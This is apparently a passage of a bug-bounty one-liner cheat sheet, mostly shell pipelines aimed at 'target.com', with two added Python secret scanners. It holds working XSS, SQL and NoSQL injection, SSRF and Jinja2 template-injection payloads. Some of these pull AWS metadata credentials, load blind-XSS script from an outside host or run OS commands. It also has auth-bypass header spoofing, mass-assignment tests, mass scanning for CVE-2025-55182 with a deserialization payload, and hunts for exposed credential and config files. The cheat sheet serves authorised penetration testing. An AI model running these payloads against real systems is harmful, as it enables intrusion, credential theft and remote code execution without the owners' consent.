cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

💀 Extract JWT Tokens from JS Files

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

💀 Find Webpack Source Maps

cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

💀 Extract Discord Webhooks from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt

💀 Find Hidden Admin Routes in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"']" | tr -d "\"'" | sort -u | anew hidden_routes.txt
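
The grep one-liners above each cover one secret type. Added example, not the repository's own code: a Python scanner that applies those same patterns to a JS bundle in one pass and reports redacted findings per line, the kind of check to run on your own bundles before deployment; the sample bundle is constructed (the AWS key is the documented AWS example key, the rest are padded dummies) and its last line shows a version string that the RFC 1918 regex also flags.

```python
import re

# Detector patterns taken from the one-liners above (AWS, Google, Slack,
# GitHub, private-key headers, JWTs, Firebase hosts, RFC 1918 addresses).
PATTERNS = {
    "aws_access_key_id": r"(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}",
    "google_api_key": r"AIza[0-9A-Za-z\-_]{35}",
    "slack_webhook": r"https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+",
    "github_token": r"(?:ghp|gho|ghu|ghs|ghr)_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}",
    "private_key": r"-----BEGIN (?:RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY(?: BLOCK)?-----",
    "jwt": r"eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*",
    "firebase_url": r"https://[a-zA-Z0-9-]+\.firebaseio\.com",
    "internal_ip": r"\b(?:10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(?:1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})\b",
}
COMPILED = {kind: re.compile(rx) for kind, rx in PATTERNS.items()}

# Constructed JS bundle: every value is a placeholder (the AWS key is the
# documented AWS example key, the others are padded dummies), not live data.
SAMPLE_JS = "\n".join([
    'var cfg = { region: "us-east-1", accessKeyId: "AKIAIOSFODNN7EXAMPLE" };',
    'const MAPS_KEY = "AIza' + "X" * 35 + '";',
    'fetch("https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX");',
    'const token = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxIn0.dummysig";',
    'const db = "https://demo-app.firebaseio.com";',
    'const internal = "http://10.0.12.7:8080/health";',
    'const version = "10.2.3.4";  // a version string the RFC 1918 regex also flags',
])


def redact(value):
    """Keep enough of a hit to recognise it in a report without copying it."""
    if len(value) > 12:
        return value[:6] + "..." + value[-3:]
    return value[:3] + "..."


def scan_js(source):
    """Return (line_no, kind, redacted_match) for every hit, in file order."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for kind, rx in COMPILED.items():
            for match in rx.finditer(line):
                findings.append((line_no, kind, redact(match.group(0))))
    return findings


def summarize(findings):
    """Number of hits per detector kind, for a quick triage view."""
    counts = {}
    for _, kind, _ in findings:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_js(SAMPLE_JS)
    for line_no, kind, shown in hits:
        print(f"line {line_no}: {kind} {shown}")
    print(summarize(hits))
```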

💉 XSS Detection

Dalfox Pipeline

cat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bav

Blind XSS with Callback

cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss Fast Scan

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

Knoxss API

cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

DOM XSS Detection

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'

Mass XSS with Nuclei DAST

cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

Reflected Parameter Detection

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

XSS Polyglot Testing

cat urls.txt | gf xss | qsreplace $'jaVasCript:/*-/*`/*\\`/*\'/*"/**/(/* */oNcLiCk=alert() )//' | httpx -silent -mr "alert"

πŸ—„οΈ SQL Injection

SQLMap Mass Scan

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

Error-Based Detection

cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

Time-Based Blind

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 -rt | anew time_based.txt

Ghauri Scan

cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

UNION Detection

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

Boolean-Based Detection

cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

NoSQL Injection

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

🌐 SSRF & SSTI

SSRF with Burp Collaborator (oastify) or Interactsh

cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

SSRF Parameter Fuzzing

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

SSTI Detection

cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

SSTI Payload Test

cat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"

Full SSRF Chain

cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF with DNS Rebinding

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

Jinja2 SSTI

cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

🕷️ Web Crawling

Katana Deep Crawl

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

Gospider Full Crawl

gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

Hakrawler with Scope

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

ParamSpider Discovery

paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

Waymore Historical URLs

waymore -i target.com -mode U -oU urls.txt

Crawl with Headless Browser

katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

Extract Forms

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

🔑 Parameter Discovery

X8 Hidden Parameters

cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

Arjun Discovery

arjun -i urls.txt -oT arjun_params.txt --stable

Custom Param Bruteforce

while read -r u; do ffuf -u "${u}?FUZZ=test" -w params.txt -mc 200,301,302 -ac; done < urls.txt

Mine Parameters from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

Parameter Pollution Test

cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

📁 Content Discovery

Ffuf Directory Bruteforce

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

💀 Recursive Fuzzing - ffuf Deep Scan

# ☠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

💀 Feroxbuster Full Recursive Scan

# ☠️ Deep recursive scan with auto-tune and smart filtering
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

💀 Feroxbuster Multi-Target Recursive

# ☠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o [email protected]

💀 ffuf + Feroxbuster Pipeline (Extensions + Recursion)

# ☠️ Find directories with ffuf, then deep scan each with feroxbuster
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

💀 Recursive Fuzzing with Extensions Mass Scan

# ☠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

💀 Feroxbuster Parallel Recursive Scan

# ☠️ Parallel scan with multiple wordlists and extensions
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

💀 Feroxbuster Silent Recursive + Headers

# ☠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

💀 Feroxbuster Extract Links + Recursive

# ☠️ Extract links from responses and add to scan queue recursively
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

💀 Feroxbuster Resume + Filter by Size

# ☠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

💀 Feroxbuster API Endpoints Discovery

# ☠️ Recursive API fuzzing with JSON content-type
feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

Git Exposure

cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

Sensitive Files

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

Backup Files

cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

API Documentation

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

Source Code Leak

cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

Config Files

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

Database Files

cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

⚡ Nuclei Scanning

Full Template Scan

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

CVE Scanning

nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

Subdomain Takeover

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

Exposed Panels

nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

Misconfigurations

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

DAST Mode

nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

Custom Tags

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

Network Scanning

nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

🔌 API Security Testing

GraphQL Introspection

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

REST API Enumeration

cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

JWT Analysis

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt

API Key Leakage

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt
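The two greps above (JWT Analysis and API Key Leakage) stop at extraction. As an added example that is not part of the repository, the Python script below reuses both patterns on a constructed text sample and then triages each JWT the way a leak report needs it: it decodes header and payload without verifying the signature (this is triage, not authentication), and flags tokens that are unsigned (`alg: none` or an empty signature segment), lack an `exp`, or are already expired. `make_token`, the placeholder signature `c2ln`, the fixed `NOW` timestamp and the sample text are constructed for this example; the API-key pattern is the page's, extended only to tolerate a space after `=` or `:`.

```python
import base64
import json
import re
import time

# Patterns from the two one-liners above (the key pattern additionally allows
# whitespace after the separator, so `apiKey: "..."` in JS objects is caught).
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*")
API_KEY_RE = re.compile(
    r"(api[_-]?key|apikey|api_secret)[=:]\s*['\"]?([A-Za-z0-9]{16,})['\"]?", re.IGNORECASE
)


def _b64url_decode(segment):
    """base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_jwt_unverified(token):
    """Split and decode header/payload. No signature check: this is triage, not auth."""
    header_b64, payload_b64, signature = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    payload = json.loads(_b64url_decode(payload_b64))
    return header, payload, signature


def assess_jwt(token, now=None):
    """Flag what matters for a leaked token: is it unsigned, and is it still valid?"""
    now = time.time() if now is None else now
    header, payload, signature = decode_jwt_unverified(token)
    flags = []
    if str(header.get("alg", "")).lower() == "none" or signature == "":
        flags.append("unsigned")
    exp = payload.get("exp")
    if exp is None:
        flags.append("no-exp")
    elif exp < now:
        flags.append("expired")
    return {"alg": header.get("alg"), "sub": payload.get("sub"), "exp": exp, "flags": flags}


def scan_text(text, now=None):
    """What the two grep one-liners would output, with every JWT decoded and triaged."""
    return {
        "jwts": [assess_jwt(t, now) for t in JWT_RE.findall(text)],
        "api_keys": [m.group(2) for m in API_KEY_RE.finditer(text)],
    }


def make_token(header, payload, signature):
    """Build a token for the constructed sample; the signature is a placeholder, not computed."""
    return ".".join([
        _b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        _b64url_encode(json.dumps(payload, separators=(",", ":")).encode()),
        signature,
    ])


# Constructed sample of the kind of text a crawl of JS/HTML produces (hypothetical values).
NOW = 1_800_000_000
OLD_TOKEN = make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "user-1", "exp": 1_700_000_000}, "c2ln")
NONE_TOKEN = make_token({"alg": "none", "typ": "JWT"}, {"sub": "svc", "exp": 1_900_000_000}, "")
SAMPLE_TEXT = f"""\
var session = "{OLD_TOKEN}";
fetch('/api', {{headers: {{Authorization: 'Bearer {NONE_TOKEN}'}}}});
const cfg = {{ apiKey: "AbCdEf1234567890XYZ", api_key: "short" }};
"""

if __name__ == "__main__":
    result = scan_text(SAMPLE_TEXT, now=NOW)
    for j in result["jwts"]:
        print(f"JWT alg={j['alg']} sub={j['sub']} exp={j['exp']} flags={j['flags']}")
    print("API keys:", result["api_keys"])
```

The expired token is still worth reporting (it shows tokens end up in client-side code), but the unsigned, still-valid one is the finding to escalate, and the `flags` list is what separates the two in a report.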

Broken Authentication

# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

Rate Limiting Test

for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

BOLA/IDOR Testing

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

💀 API Endpoint Fuzzing with ffuf

# ☠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

💀 API Version Fuzzing

# ☠️ Discover hidden API versions
ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

💀 REST API Methods Fuzzing

# ☠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

💀 GraphQL Fuzzing with ffuf

# ☠️ Fuzz GraphQL endpoints for introspection and queries
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

💀 API Parameter Fuzzing

# ☠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

💀 API Authentication Bypass Fuzzing

# ☠️ Test auth bypass techniques on protected endpoints
cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

💀 OpenAPI/Swagger Fuzzing

# ☠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

💀 API JSON Fuzzing with Nuclei

# ☠️ Mass API fuzzing with nuclei DAST mode
cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

💀 API Mass Assignment Fuzzing

# ☠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

💀 API FUZZ with Custom Wordlist Generation

# ☠️ Generate API wordlist from JS files and fuzz
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\']/(api|v[0-9])/[a-zA-Z0-9/_-]+[\"\']" | tr -d "\"'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json

☁️ Cloud Security

AWS S3 Bucket Finder

cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

S3 Permission Check

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

Firebase Database

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt

GCP Storage

cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

AWS Metadata SSRF

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

Cloud Credential Files

cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

🤖 Automation Scripts

Full Recon Pipeline

#!/bin/bash
domain=$1
mkdir -p $domain && cd $domain

# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt

# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt

# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt

# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt

# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

XSS Hunter Script

#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

API Recon Script

#!/bin/bash
target=$1
mkdir -p $target/api && cd $target/api

# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "/api/[^\"'\`[:space:]<>]+" | sort -u | anew js_api_endpoints.txt

# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

⚙️ Bash Functions

Add to your .bashrc or .zshrc:

# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

🆕 New Oneliners 2024-2025

⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - CRITICAL) ⚡🔥⚡

💀 Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV 💀

⚡ Detect Next.js Apps (Recon First)

cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

⚡ Check if Next-Action Header is Accepted

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

⚡ Mass Detection - Next-Action Header Accepted

cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

⚡ Create Payload Files for Testing

# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

⚡ Manual Vulnerability Check with cURL

curl -X POST https://target.com -H "Next-Action: check" -F "[email protected]" -F "[email protected]" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

⚡ One-liner: Full Detection Pipeline

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

⚡ Detect Vulnerable Response Headers

cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

⚡ Mass Scan with httpx + Next-Action Probe

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

⚡ Shodan Dork for Next.js Targets

shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

⚡ Nuclei Template Check

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

⚡ Find & Test - Complete One-liner

subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

⚡ Check RSC Endpoint Directly

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

⚡ Batch Test from File with Parallel

cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

⚠️ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Fix: Update to React 19.0.1/19.1.2/19.2.1

🎯 Key Detection: Apps accepting Next-Action header + RSC deserialization = Potential RCE


Nuclei DAST XSS

